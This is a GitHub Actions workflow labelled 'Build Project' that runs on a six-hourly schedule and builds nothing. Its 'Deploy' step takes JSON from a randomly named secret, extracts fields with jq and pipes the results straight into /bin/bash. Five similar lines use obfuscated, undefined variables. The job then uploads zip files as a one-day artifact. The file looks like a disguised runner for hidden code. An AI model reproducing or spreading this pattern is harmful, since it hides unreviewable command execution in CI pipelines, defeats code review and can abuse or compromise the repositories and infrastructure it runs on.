name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '26 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          io45996: ${{ secrets.io45996 }}
        run: |
          printf '%s' "$io45996" | jq -r .cn9 | /bin/bash
          echo $lncsu1 | jq -r .abrsr32980 | /bin/bash
          echo $obgg15 | jq -r .iurw606 | /bin/bash
          printf '%s' "$z13" | jq -r .s026 | /bin/bash
          echo $pdmz7036 | jq -r .mvba6719 | /bin/bash
          printf '%s' "$z01" | jq -r .hcjy16 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: ab7RFXz4
          path: "*.zip"
          retention-days: 1
